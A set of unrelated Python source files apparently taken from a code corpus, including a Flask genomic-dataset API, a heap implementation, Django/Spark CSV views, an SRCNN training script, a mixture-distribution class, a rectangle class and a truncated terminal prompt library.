{"seq_id":"286493344","text":"from dataclasses import asdict\n\nfrom flask import Blueprint, Response, abort, current_app as app, jsonify, request\nfrom flask_login import current_user, login_required\nfrom sqlalchemy import distinct, func\nfrom sqlalchemy.orm import contains_eager, joinedload\n\nfrom . 
import models\nfrom .extensions import db\nfrom .utils import (\n check_admin,\n enum_validate,\n filter_in_enum_or_abort,\n filter_updated_or_abort,\n mixin,\n paged,\n transaction_or_abort,\n)\n\neditable_columns = [\n \"dataset_type\",\n \"notes\",\n \"condition\",\n \"extraction_protocol\",\n \"capture_kit\",\n \"library_prep_method\",\n \"library_prep_date\",\n \"read_length\",\n \"read_type\",\n \"sequencing_id\",\n \"sequencing_date\",\n \"sequencing_centre\",\n \"batch_id\",\n \"discriminator\",\n]\n\ndatasets_blueprint = Blueprint(\n \"datasets\",\n __name__,\n)\n\n\n@datasets_blueprint.route(\"/api/datasets\", methods=[\"GET\"])\n@login_required\n@paged\ndef list_datasets(page: int, limit: int) -> Response:\n order_by = request.args.get(\"order_by\", type=str)\n allowed_columns = [\n \"dataset_type\",\n \"condition\",\n \"notes\",\n \"updated\",\n \"updated_by\",\n \"linked_files\",\n \"tissue_sample_type\",\n \"participant_codename\",\n \"family_codename\",\n ]\n if order_by is None:\n order = None # system default, likely dataset_id\n elif order_by == \"updated_by\":\n order = models.Dataset.updated_by.username\n elif order_by == \"linked_files\":\n order = models.DatasetFile.path\n elif order_by == \"tissue_sample_type\":\n order = models.TissueSample.tissue_sample_type\n elif order_by == \"participant_codename\":\n order = models.Participant.participant_codename\n elif order_by == \"family_codename\":\n order = models.Family.family_codename\n elif order_by in allowed_columns:\n # Since this is an elif clause, we know special cases are already handled above.\n # order_by has been restricted to a known list, so we can safely use getattr\n order = getattr(models.Dataset, order_by)\n else:\n abort(400, description=f\"order_by must be one of {allowed_columns}\")\n\n if order:\n order_dir = request.args.get(\"order_dir\", type=str)\n if order_dir == \"desc\":\n order = order.desc()\n elif order_dir == \"asc\":\n order = order.asc()\n else:\n abort(400, description=\"order_dir must be either 'asc' or 'desc'\")\n\n filters = []\n notes = request.args.get(\"notes\", type=str)\n if notes:\n filters.append(func.instr(models.Dataset.notes, notes))\n updated_by = request.args.get(\"updated_by\", type=str)\n if updated_by:\n filters.append(func.instr(models.User.username, updated_by))\n linked_files = request.args.get(\"linked_files\", type=str)\n if linked_files:\n filters.append(func.instr(models.DatasetFile.path, linked_files))\n participant_codename = request.args.get(\"participant_codename\", type=str)\n if participant_codename:\n filters.append(\n func.instr(models.Participant.participant_codename, participant_codename)\n )\n family_codename = request.args.get(\"family_codename\", type=str)\n if family_codename:\n filters.append(func.instr(models.Family.family_codename, family_codename))\n dataset_type = request.args.get(\"dataset_type\", type=str)\n if dataset_type:\n filters.append(models.Dataset.dataset_type.in_(dataset_type.split(\",\")))\n condition = request.args.get(\"condition\", type=str)\n if condition:\n filters.append(\n filter_in_enum_or_abort(\n models.Dataset.condition, models.DatasetCondition, condition\n )\n )\n tissue_sample_type = request.args.get(\"tissue_sample_type\", type=str)\n if tissue_sample_type:\n filters.append(\n filter_in_enum_or_abort(\n models.TissueSample.tissue_sample_type,\n models.TissueSampleType,\n tissue_sample_type,\n )\n )\n updated = request.args.get(\"updated\", type=str)\n if updated:\n 
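# filter_updated_or_abort is expected to parse the date filter and abort the\n        # request if the value is malformed\n        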
filters.append(filter_updated_or_abort(models.Dataset.updated, updated))\n\n if app.config.get(\"LOGIN_DISABLED\") or current_user.is_admin:\n user_id = request.args.get(\"user\")\n else:\n user_id = current_user.user_id\n if user_id: # Regular user or assumed identity, return only permitted datasets\n query = (\n models.Dataset.query.options(\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .contains_eager(models.Participant.family),\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .joinedload(models.Participant.institution),\n contains_eager(models.Dataset.files),\n contains_eager(models.Dataset.updated_by),\n )\n .join(models.Dataset.tissue_sample)\n .join(models.TissueSample.participant)\n .join(models.Participant.family)\n .outerjoin(models.Dataset.files)\n .join(models.Dataset.updated_by)\n .join(models.groups_datasets_table)\n .join(\n models.users_groups_table,\n models.groups_datasets_table.columns.group_id\n == models.users_groups_table.columns.group_id,\n )\n .filter(models.users_groups_table.columns.user_id == user_id, *filters)\n )\n else: # Admin or LOGIN_DISABLED, authorized to query all datasets\n query = (\n models.Dataset.query.options(\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .contains_eager(models.Participant.family),\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .joinedload(models.Participant.institution),\n contains_eager(models.Dataset.files),\n contains_eager(models.Dataset.updated_by),\n )\n .join(models.Dataset.tissue_sample)\n .join(models.TissueSample.participant)\n .join(models.Participant.family)\n .outerjoin(models.Dataset.files)\n .join(models.Dataset.updated_by)\n .filter(*filters)\n )\n\n total_count = query.with_entities(\n func.count(distinct(models.Dataset.dataset_id))\n ).scalar()\n datasets = query.order_by(order).limit(limit).offset(page * (limit or 0)).all()\n\n return jsonify(\n {\n \"data\": [\n {\n **asdict(dataset),\n \"tissue_sample_type\": dataset.tissue_sample.tissue_sample_type,\n \"participant_codename\": dataset.tissue_sample.participant.participant_codename,\n \"participant_type\": dataset.tissue_sample.participant.participant_type,\n \"institution\": dataset.tissue_sample.participant.institution\n and dataset.tissue_sample.participant.institution.institution,\n \"sex\": dataset.tissue_sample.participant.sex,\n \"family_codename\": dataset.tissue_sample.participant.family.family_codename,\n \"created_by\": dataset.tissue_sample.created_by.username,\n \"updated_by\": dataset.tissue_sample.updated_by.username,\n }\n for dataset in datasets\n ],\n \"page\": page if limit else 0,\n \"total_count\": total_count,\n }\n )\n\n\n@datasets_blueprint.route(\"/api/datasets/\", methods=[\"GET\"])\n@login_required\ndef get_dataset(id: int):\n if app.config.get(\"LOGIN_DISABLED\") or current_user.is_admin:\n user_id = request.args.get(\"user\")\n else:\n user_id = current_user.user_id\n\n if user_id:\n dataset = (\n models.Dataset.query.filter_by(dataset_id=id)\n .options(\n joinedload(models.Dataset.analyses),\n joinedload(models.Dataset.created_by),\n joinedload(models.Dataset.updated_by),\n joinedload(models.Dataset.tissue_sample)\n .joinedload(models.TissueSample.participant)\n .joinedload(models.Participant.family),\n )\n .join(models.groups_datasets_table)\n .join(\n models.users_groups_table,\n 
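# join users_groups to groups_datasets so that only datasets shared with\n                # one of this user's groups are returned\n                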
models.groups_datasets_table.columns.group_id\n == models.users_groups_table.columns.group_id,\n )\n .filter(models.users_groups_table.columns.user_id == user_id)\n .first_or_404()\n )\n else:\n dataset = (\n models.Dataset.query.filter_by(dataset_id=id)\n .options(\n joinedload(models.Dataset.analyses),\n joinedload(models.Dataset.created_by),\n joinedload(models.Dataset.updated_by),\n joinedload(models.Dataset.tissue_sample)\n .joinedload(models.TissueSample.participant)\n .joinedload(models.Participant.family),\n )\n .first_or_404()\n )\n\n return jsonify(\n {\n **asdict(dataset),\n \"tissue_sample\": dataset.tissue_sample,\n \"participant_codename\": dataset.tissue_sample.participant.participant_codename,\n \"participant_type\": dataset.tissue_sample.participant.participant_type,\n \"institution\": dataset.tissue_sample.participant.institution.institution\n if dataset.tissue_sample.participant.institution\n else None,\n \"sex\": dataset.tissue_sample.participant.sex,\n \"family_codename\": dataset.tissue_sample.participant.family.family_codename,\n \"created_by\": dataset.tissue_sample.participant.created_by.username,\n \"updated_by\": dataset.tissue_sample.participant.updated_by.username,\n \"analyses\": [\n {\n **asdict(analysis),\n \"requester\": analysis.requester.username,\n \"updated_by\": analysis.updated_by.username,\n \"assignee\": analysis.assignee.username,\n }\n for analysis in dataset.analyses\n ],\n }\n )\n\n\n@datasets_blueprint.route(\"/api/datasets/\", methods=[\"PATCH\"])\n@login_required\ndef update_dataset(id: int):\n if not request.json:\n abort(415, description=\"Request body must be JSON\")\n\n if app.config.get(\"LOGIN_DISABLED\") or current_user.is_admin:\n user_id = request.args.get(\"user\")\n else:\n user_id = current_user.user_id\n\n if user_id:\n dataset = (\n models.Dataset.query.filter_by(dataset_id=id)\n .join(models.groups_datasets_table)\n .join(\n models.users_groups_table,\n models.groups_datasets_table.columns.group_id\n == models.users_groups_table.columns.group_id,\n )\n .filter(models.users_groups_table.columns.user_id == user_id)\n .first_or_404()\n )\n else:\n dataset = models.Dataset.query.filter_by(dataset_id=id).first_or_404()\n\n enum_error = mixin(dataset, request.json, editable_columns)\n\n if enum_error:\n abort(400, description=enum_error)\n\n if \"linked_files\" in request.json:\n for existing in dataset.files:\n if existing.path not in request.json[\"linked_files\"]:\n db.session.delete(existing)\n for path in request.json[\"linked_files\"]:\n if path not in dataset.linked_files:\n dataset.files.append(models.DatasetFile(path=path))\n\n if user_id:\n dataset.updated_by_id = user_id\n\n transaction_or_abort(db.session.commit)\n\n return jsonify(\n {\n **asdict(dataset),\n \"updated_by\": dataset.updated_by.username,\n \"created_by\": dataset.created_by.username,\n }\n )\n\n\n@datasets_blueprint.route(\"/api/datasets/\", methods=[\"DELETE\"])\n@login_required\n@check_admin\ndef delete_dataset(id: int):\n dataset = (\n models.Dataset.query.filter(models.Dataset.dataset_id == id)\n .options(joinedload(models.Dataset.analyses))\n .first_or_404()\n )\n if not dataset.analyses:\n try:\n db.session.delete(dataset)\n db.session.commit()\n return \"Updated\", 204\n except:\n db.session.rollback()\n abort(500, description=\"Server error\")\n else:\n abort(422, description=\"Dataset has analyses, cannot delete\")\n\n\n@datasets_blueprint.route(\"/api/datasets\", methods=[\"POST\"])\n@login_required\ndef create_dataset():\n if not request.json:\n 
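# as in the PATCH handler, only JSON request bodies are accepted\n        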
abort(415, description=\"Request body must be JSON\")\n\n    dataset_type = request.json.get(\"dataset_type\")\n    if not dataset_type:\n        abort(400, description=\"A dataset type must be provided\")\n\n    tissue_sample_id = request.json.get(\"tissue_sample_id\")\n    if not tissue_sample_id:\n        abort(400, description=\"A tissue sample id must be provided\")\n\n    sequencing_date = request.json.get(\"sequencing_date\")\n    if not sequencing_date:\n        abort(400, description=\"A sequencing date must be provided\")\n\n    models.TissueSample.query.filter_by(\n        tissue_sample_id=tissue_sample_id\n    ).first_or_404()\n\n    enum_error = enum_validate(models.Dataset, request.json, editable_columns)\n\n    if enum_error:\n        abort(400, description=enum_error)\n\n    try:\n        created_by_id = updated_by_id = current_user.user_id\n    except: # LOGIN DISABLED\n        created_by_id = updated_by_id = 1\n\n    dataset = models.Dataset(\n        **{\n            \"tissue_sample_id\": tissue_sample_id,\n            \"dataset_type\": dataset_type,\n            \"notes\": request.json.get(\"notes\"),\n            \"condition\": request.json.get(\"condition\"),\n            \"extraction_protocol\": request.json.get(\"extraction_protocol\"),\n            \"capture_kit\": request.json.get(\"capture_kit\"),\n            \"library_prep_method\": request.json.get(\"library_prep_method\"),\n            \"library_prep_date\": request.json.get(\"library_prep_date\"),\n            \"read_length\": request.json.get(\"read_length\"),\n            \"read_type\": request.json.get(\"read_type\"),\n            \"sequencing_id\": request.json.get(\"sequencing_id\"),\n            \"sequencing_date\": request.json.get(\"sequencing_date\"),\n            \"sequencing_centre\": request.json.get(\"sequencing_centre\"),\n            \"batch_id\": request.json.get(\"batch_id\"),\n            \"created_by_id\": created_by_id,\n            \"updated_by_id\": updated_by_id,\n            \"discriminator\": request.json.get(\"discriminator\"),\n        }\n    )\n    # TODO: add stricter checks?\n    if request.json.get(\"linked_files\"):\n        for path in request.json[\"linked_files\"]:\n            dataset.files.append(models.DatasetFile(path=path))\n    db.session.add(dataset)\n    transaction_or_abort(db.session.commit)\n    ds_id = dataset.dataset_id\n    location_header = \"/api/datasets/{}\".format(ds_id)\n\n    return (\n        jsonify(\n            {\n                **asdict(dataset),\n                \"updated_by\": dataset.updated_by.username,\n                \"created_by\": dataset.created_by.username,\n            }\n        ),\n        201,\n        {\"location\": location_header},\n    )\n","sub_path":"flask/app/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":15479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"93483019","text":"\"\"\"\n\n@Author: Li Zenghui\n@Date: 2020-03-22 11:11\n\"\"\"\nimport heapq\n\nclass Heap:\n    def __init__(self,elist):\n        self._elems=list(elist)\n        if elist:\n            self.buildheap()\n\n    def is_empty(self):\n        return not self._elems\n\n    # peek at the top element\n    def peek(self):\n        if self.is_empty():\n            raise ValueError(\"heap is empty\")\n        return self._elems[0]\n\n    # sift up\n    def siftup(self, e, last):\n        elems, i, j=self._elems, last, (last-1)//2\n        while i > 0 and e < elems[j]:\n            elems[i] = elems[j]\n            i, j = j, (j-1)//2\n        elems[i] = e\n\n    # insert\n    def push(self, e):\n        self._elems.append(None)\n        self.siftup(e, len(self._elems)-1)\n\n    # sift down\n    def siftdown(self,e,begin,end):\n        elems,i,j=self._elems,begin,begin*2+1\n        while j < end:\n            if j+1 < end and elems[j+1] < elems[j]:\n                j += 1\n            if e < elems[j]:\n                break\n            elems[i] = elems[j]\n            i, j = j, 2*j+1\n        elems[i] = e\n\n    # pop the smallest element\n    def pop(self):\n        if self.is_empty():\n            raise ValueError(\"heap is empty\")\n        elems = self._elems\n        e0 = elems[0]\n        e = elems.pop()\n        if len(elems) > 0:\n            self.siftdown(e,0,len(elems))\n        return e0\n\n    # build a heap from a list\n    def buildheap(self):\n        end=len(self._elems)\n        for i in range(end//2-1,-1,-1):\n            self.siftdown(self._elems[i],i,end)\n\n\nif __name__ == '__main__':\n    h = Heap([4, 1, 5, 3, 2, 7, 6])\n    print(h.pop())\n    print(h.pop())\n    print(h.pop())\n    print(h.pop())\n    
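# a min-heap always pops its current minimum, so the values print in ascending order\n    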
print(h.pop())\n print(h.pop())","sub_path":"数据结构/队列、堆/06.实现堆.py","file_name":"06.实现堆.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604178570","text":"import io\nimport os\nimport zipfile\n\nfrom django.shortcuts import redirect\nfrom pyspark import SparkContext, SparkConf\n\nimport requests\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom extractor.forms import FileUrlForm\n\nfrom functions.headers import get_headers_as_tuple\nfrom functions.filter import filter_csv_rows\n\n\ndef index(request):\n template = loader.get_template('extractor/index.html')\n if request.method == 'POST':\n form = FileUrlForm(request.POST)\n if form.is_valid():\n url = request.POST['url']\n result = requests.get(url, stream=True)\n if result.status_code != 200:\n context = {'form': FileUrlForm(),\n 'message': 'Couldn\\'t retrieve file - ' + str(result.status_code)}\n return HttpResponse(template.render(context, request))\n else:\n zip = zipfile.ZipFile(io.BytesIO(result.content))\n zip.extractall(path='./data')\n\n datafile = None\n for root, subdirs, files in os.walk('./data'):\n if datafile is not None:\n break;\n for file in files:\n if file.endswith('.csv'):\n datafile = root + '/' + file\n break\n if datafile is not None:\n request.session['datafile'] = datafile\n return redirect('/file')\n\n else:\n form = FileUrlForm()\n\n context = {'form': form}\n return HttpResponse(template.render(context, request))\n\n\ndef file(request):\n datafile = request.session['datafile']\n sc = SparkContext(conf=SparkConf().setAppName(\"data\").setMaster(\"local[2]\"))\n data_text_file = sc.textFile(datafile)\n headers = get_headers_as_tuple(data_text_file)\n\n count = data_text_file.count() - 1\n context = {\n 'file_headers': headers,\n 'count': count\n }\n\n template = loader.get_template('extractor/file.html')\n sc.stop()\n return HttpResponse(template.render(context, request))\n\n\ndef filter(request):\n filter_value = request.POST['filter_value']\n header = request.POST['form_control_headers_select']\n datafile = request.session['datafile']\n sc = SparkContext(conf=SparkConf().setAppName(\"data\").setMaster(\"local[2]\"))\n data_text_file = sc.textFile(datafile)\n result = filter_csv_rows(data_text_file, header, filter_value)\n sc.stop()\n\n","sub_path":"extractor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"608681186","text":"import os\r\nimport argparse\r\nimport torch\r\nimport time\r\nimport shutil\r\nimport utils\r\nfrom model import SRCNN\r\n\r\n\r\ndef parse_args():\r\n\tdescrip = \"Super resolution model\"\r\n\tparser = argparse.ArgumentParser(description=descrip)\r\n\tparser.add_argument(\"--model\", type=str, default=\"SRCNN\", help=\"select which model to use\")\r\n\tparser.add_argument(\"--lr_data_dir\", type=str, default=\"train_images_64\",\\\r\n\t\thelp=\"dir of Low Resolution images\")\r\n\tparser.add_argument(\"--hr_data_dir\", type=str, default = \"train_images_128\", \\\r\n\t\thelp=\"dir of High Resolution images\")\r\n\tparser.add_argument(\"--n_epoches\", type=int, default=5, help=\"the num of n_epoches\")\r\n\tparser.add_argument(\"--batch_size\", type=int, default=3, help=\"batch size\")\r\n\tparser.add_argument(\"--lr\", type=float, default=0.001, help=\"learning rate\")\r\n\tparser.add_argument(\"--save_res_dir\", type=str, 
default=\"Result\", help=\"diretory to save results and model\")\r\n\tparser.add_argument(\"--res_reciever\", type=str, default=\"widen1226@gmail.com\", help=\"email address to recieve the result\")\r\n\tparser.add_argument(\"--validation\", type=bool, default=False, help=\"whether do 10 fold cross validation or not\")\r\n\tparser.add_argument(\"--test_percent\",type=float, default=0.33, help=\"determine how large is the test set\")\r\n\treturn parser.parse_args()\r\n\r\n\r\ndef main():\r\n\t\"\"\"\r\n\tsomething check args here\r\n\t\"\"\"\r\n\targs = parse_args()\r\n\t\r\n\tif args.model == \"SRCNN\":\r\n\t\tmodel = SRCNN(args)\r\n\r\n\tprint(\"start loading data...\")\r\n\tt1 = time.perf_counter()\r\n\tmodel.load_data()\r\n\tt2 = time.perf_counter()\r\n\tprint(\"data loading completed! time used: %.2f s\" % (t2-t1))\r\n\r\n\tprint(\"start training...\")\r\n\tt3 = time.perf_counter()\r\n\tmodel.train()\r\n\tt4 = time.perf_counter()\r\n\tprint(\"training process completed! time used: %.2f s\" % (t4-t3))\r\n\r\n\tprint(\"start testing...\")\r\n\tt5 = time.perf_counter()\r\n\tmodel.test()\r\n\tt6 = time.perf_counter()\r\n\tprint(\"testing process completed! time used: %.2f s\" % (t6-t5))\r\n\r\n\tprint(\"start test single images...\")\r\n\tt7 = time.perf_counter()\r\n\tmodel.test_single_img(\"test_images_64\")\r\n\tt8 = time.perf_counter()\r\n\tprint(\"testing process completed! time used: %.2f s\" % (t8-t7))\r\n\r\n\t# send to result as email\r\n\tattachment = \"Result\"\r\n\tshutil.make_archive(attachment, 'zip', args.save_res_dir)\r\n\tutils.email_res(reciever = args.res_reciever,\r\n\t\tsubject=\"run_result\",content=None,attach=attachment)\r\n\r\nif __name__ == '__main__':\r\n\tstart = time.perf_counter()\r\n\tmain()\r\n\tend = time.perf_counter()\r\n\tprint(\"********************\")\r\n\tprint(\"All completed! 
Total time:%.2f s\" % (end-start))\r\n\tprint(\"********************\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"545750059","text":"from numpy import zeros, linspace, exp, random, cumsum, inner, insert, append, argmax\n# from scipy import integrate\nfrom bisect import bisect_left\nfrom scipy.interpolate import interp1d\n\nclass RV:\n\tnPoints = 1000\n\t\n\tdef __init__(self, meanList, varianceList, supportList, weights = None):\n\t\tn = len(meanList)\n\t\t\n\t\t# initialize attributes\n\t\tself.mean = [0]\n\t\tself.variance = [0]\n\t\tself.median = [0]\n\t\tself.mode = [0]\n\t\t\n\n\t\t\n\t\tif weights is None:\n\t\t\tweights = [1./n for k in range(n)]\n\t\t\n\t\t\n\t\t# get the overall support of the distribution\n\t\tminSupp, maxSupp = float('inf'), -float('inf')\n\t\tfor k in range(n):\n\t\t\tif minSupp > supportList[k][0] : minSupp = supportList[k][0]\n\t\t\tif maxSupp < supportList[k][1] : maxSupp = supportList[k][1]\n\t\t\n\t\tself.support = [(minSupp, maxSupp)]\n\t\tself.x = [linspace(minSupp, maxSupp, num=RV.nPoints)]\n\n\t\tself.pdf = [zeros(RV.nPoints)]\n\t\tself.cdf = [zeros(RV.nPoints)]\n\n\t\t\n\t\t# calculate the individual distributions\n\t\tfor k in range(n):\n\t\t\tself.support.append(supportList[k]) \n\t\t\tself.x.append( linspace(supportList[k][0], supportList[k][1], num=RV.nPoints) )\n\t\t\tself.__individualDistribution(self.x[-1], meanList[k], varianceList[k], weights[k])\n\t\t\t\n\t\t# calculate overall statistics\n\t\tself.deriveStatistics(self.x[0], self.pdf[0], 1, \"overall\")\n\t\t\n\t\t\n\t# calculate individual distribution\n\tdef __individualDistribution(self, x, mean, var, weight):\n\t\t\n\t\t# un-normalized gaussian probability density\n\t\tdef f(x):\n\t\t\treturn exp(-(x-mean)**2 / (2*var))\t\t\t\t\t\t\t\n\t\t\t\n\t\t\t\n\t\t# get min and max support of the distribution\n\t\txmin, xmax = x.min(), x.max()\n\n\t\t# make distribution (pdf) over [2*xmin-xmax, 2*xmax-xmin] \n\t\tp = f(x); # distribution over [xmin, xmax] \n\t\tleftTail = f(linspace(2*xmin-xmax, xmin, num=RV.nPoints)) # distribution over [2*xmin-xmax, xmin]\n\t\trightTail = f(linspace(xmax, 2*xmax-xmin, num=RV.nPoints)) # distribution over [xmax, 2*xmax-xmin]\n\t\t\n\t\t# relect the tails and subtract it from p\n\t\tp -= leftTail[::-1] + rightTail[::-1]\t\t\n\t\tp -= p.min()# ensure p is non-negative\n\t\tp = p/p.sum()# normalize p\n\t\t\n\t\t# update the statistics (at the end of the list)\n\t\tself.deriveStatistics(x, p, weight, \"individual\") \t\n\n\t\t\n\t\t# add the individual pdf to the overall pdf\n\t\t\n\t\t# pad the ends of p with zeros\n\t\tp = insert(p, 0,0) \n\t\tp = append(p,0)\n\t\t\n\t\t# align x with self.x[0]\n\t\tx = insert(x, 0, self.x[0][0]) \n\t\tx = append(x, self.x[0][-1])\n\t\t\n\t\t\n\t\t# interpolate p(x) over the grid points of self.x[0]\n\t\tpInterp = interp1d(x,p)\n\t\tpAdd = pInterp(self.x[0])\n\t\tself.pdf[0] += pAdd/sum(pAdd)*weight\t\t\n\n\n\n\n\t\n\t# derive the rest of the distribution using the pdf\n\tdef deriveStatistics(self, x, p, weight, distibutionType):\n\t\tif distibutionType == \"individual\":\t\t\n\t\t\t\n\t\t\tself.pdf.append(weight*p*(self.x[0][-1]- self.x[0][0])/(x[-1] - x[0])) \n\t\t\t\n\t\t\tself.cdf.append(cumsum(p)) # cummulative sum of the pdf\n\t\t\t\n\t\t\tmu = inner(p,x) \n\t\t\tself.mean.append(mu)\n\t\t\t\n\t\t\tself.variance.append(inner(p,(x - mu)**2) )\n\t\t\t\n\t\t\t\n\t\t\tindex = 
bisect_left(self.cdf[-1], 0.5) # last index with CDF[ind] <=0.5\n\t\t\tself.median.append(x[index])\n\t\t\t\n\t\t\tindex = argmax(p)\n\t\t\tself.mode.append(x[index])\n\t\t\t\n\t\t\t\n\t\t\t\n\t\telse: \t\t\n\t\t\tself.cdf[0] = cumsum(p) # cummulative sum of the pdf\n\t\t\t\n\t\t\tmu = inner(p,x) \n\t\t\tself.mean[0] = mu\n\t\t\t\n\t\t\tself.variance[0] = inner(p,(x - mu)**2) \n\t\t\t\n\t\t\t\n\t\t\tindex = bisect_left(self.cdf[0], 0.5) # last index with CDF[ind] <=0.5\n\t\t\tself.median[0] = x[index]\n\t\t\t\n\t\t\tindex = argmax(p)\n\t\t\tself.mode[0] = x[index]\n\t\t\t\t\n\t\n\tdef displayStats(self):\t\t\n\t\tfor k in range(len(self.mean)):\t\n\t\t\tif k==0 : print(\"Overall Distribution Statistics:\")\n\t\t\telif k==1 : print(\"Individual Distribution Statistics:\")\n\n\t\t\tprint((\" k={0}:\"\n\t\t\t\t \" mean={1:.2f}\"\n\t\t\t\t \" variance={2:.2f}\"\n\t\t\t\t \" support=({3[0]},{3[1]})\"\n\t\t\t\t \" median={4:.2f}\"\n\t\t\t\t \" mode={5:.2f}\")\\\n\t\t\t\t .format(k, self.mean[k], self.variance[k], self.support[k], self.median[k], self.mode[k]))\n\n\n\n\tdef randomSample(self):\n\t\t# obtain a random sample using the inverse CDF \n\t\tind = bisect_left(self.cdf[0], random.rand()) \n\t\t\n\t\treturn self.x[0][ind]\n\t\t\n\t\t\n\t\t\n\t\n\n\t\t\n\t\t\n\t\t\n\n","sub_path":"RandomVariable.py","file_name":"RandomVariable.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"227393477","text":"from PolygonLib import Polygon\n\nclass Rectangle(Polygon):\n def __init__(self):\n super().__init__(4)\n\n def setSideLength(self):\n super().setSideLength()\n distinctLengthSet = set(self.Sides)\n if len(distinctLengthSet) > 2:\n raise Exception(\"invalid side length for a rectangle\")\n\n def findArea(self):\n area = 0\n distinctLengthSet = set(self.Sides)\n distinctLengthList = list(distinctLengthSet)\n if len(distinctLengthList) == 2:\n area = distinctLengthList[0] * distinctLengthList[1]\n elif len(distinctLengthList) == 1:\n area = distinctLengthList[0] ** 2\n else:\n raise Exception(\"Unable to find the area due to invalid side length\")\n print(\"The area of this rectangle is {0}\".format(area))\n\n def findPerimeter(self):\n perimeter = 0\n for side in self.Sides:\n perimeter = perimeter + side\n print(\"the perimeter of this rectangle is {}\".format(perimeter))\n\nmyRectangle = Rectangle()\nmyRectangle.setSideLength()\nmyRectangle.showSideLength()\nmyRectangle.findArea()\nmyRectangle.findPerimeter()","sub_path":"yxg/Practices/Class/Rectangle.py","file_name":"Rectangle.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"26621226","text":"import enum\nimport types\nimport wrapio\nimport os\nimport string\nimport itertools\n\nfrom . 
import helpers\n\n\n__all__ = ('Source', 'Translator', 'LineEditor', 'MultiLineEditor', 'Select',\n 'MultiSelect')\n\n\n_blocks = string.whitespace + string.punctuation\n\n\nclass Source(helpers.Handle):\n\n \"\"\"\n Turns stdin reads into events.\n \"\"\"\n\n Event = enum.Enum(\n 'Event',\n 'move_left move_right jump_left jump_right move_up move_down '\n 'delete_left delete_right escape indent enter insert'\n )\n\n _events = types.SimpleNamespace(\n arrows = {\n 'D': Event.move_left,\n 'C': Event.move_right,\n 'A': Event.move_up,\n 'B': Event.move_down\n },\n normal = {\n '\\x0d': Event.enter,\n '\\x0a': Event.enter,\n '\\x7f': Event.delete_left,\n '\\x08': Event.delete_right,\n '\\x09': Event.indent\n },\n special = {\n '': Event.escape,\n 'b': Event.jump_left,\n 'f': Event.jump_right\n }\n )\n\n __slots__ = ('_io', '_done')\n\n def __init__(self, io, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._io = io\n\n self._done = False\n\n def _escape(self):\n\n key = self._io.recv()\n\n if key == '[':\n key = self._io.recv()\n events = self._events.arrows\n else:\n events = self._events.special\n\n return (events, key)\n\n def _advance(self):\n\n key = self._io.recv()\n\n if key == '\\x1b':\n (events, key) = self._escape()\n else:\n events = self._events.normal\n\n event = events.get(key, self.Event.insert)\n\n self._dispatch(event, key)\n\n def done(self):\n\n self._done = True\n\n def stream(self):\n\n with self._io.atomic:\n while not self._done:\n self._advance()\n\n self._done = False\n\n\nclass Abort(Exception):\n\n \"\"\"\n Raise when something's wrong.\n \"\"\"\n\n __slots__ = ()\n\n\nclass Translator(helpers.Handle):\n\n \"\"\"\n Combines related io events into single events with relevant info.\n\n .. code-block: python\n\n translator = Translator(callback = ...)\n source = Source(io, callback = translator.invoke)\n \"\"\"\n\n Event = enum.Enum(\n 'Event',\n 'move_x jump_x move_y delete insert enter'\n )\n\n __slots__ = ('_io',)\n\n def __init__(self, io, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._io = io\n\n def _move_x(self, left):\n\n self._dispatch(self.Event.move_x, left)\n\n @wrapio.event(Source.Event.move_left)\n def _nnc(self, key):\n\n self._move_x(True)\n\n @wrapio.event(Source.Event.move_right)\n def _nnc(self, key):\n\n self._move_x(False)\n\n def _jump_x(self, left):\n\n self._dispatch(self.Event.jump_x, left)\n\n @wrapio.event(Source.Event.jump_left)\n def _nnc(self, key):\n\n self._jump_x(True)\n\n @wrapio.event(Source.Event.jump_right)\n def _nnc(self, key):\n\n self._jump_x(False)\n\n def _move_y(self, up):\n\n self._dispatch(self.Event.move_y, up)\n\n @wrapio.event(Source.Event.move_up)\n def _nnc(self, key):\n\n self._move_y(True)\n\n @wrapio.event(Source.Event.move_down)\n def _nnc(self, key):\n\n self._move_y(False)\n\n def _delete(self, left):\n\n self._dispatch(self.Event.delete, left)\n\n @wrapio.event(Source.Event.delete_left)\n def _nnc(self, key):\n\n self._delete(True)\n\n @wrapio.event(Source.Event.delete_right)\n def _nnc(self, key):\n\n self._delete(False)\n\n def _insert(self, key):\n\n self._dispatch(self.Event.insert, key)\n\n @wrapio.event(Source.Event.insert)\n def _nnc(self, key):\n\n self._insert(key)\n\n @wrapio.event(Source.Event.indent)\n def _nnc(self, key):\n\n self._insert('\\t')\n\n def _enter(self, key):\n\n self._dispatch(self.Event.enter, key)\n\n @wrapio.event(Source.Event.enter)\n def _nnc(self, key):\n\n self._enter(key)\n\n def invoke(self, *args, **kwargs):\n\n try:\n fail = 
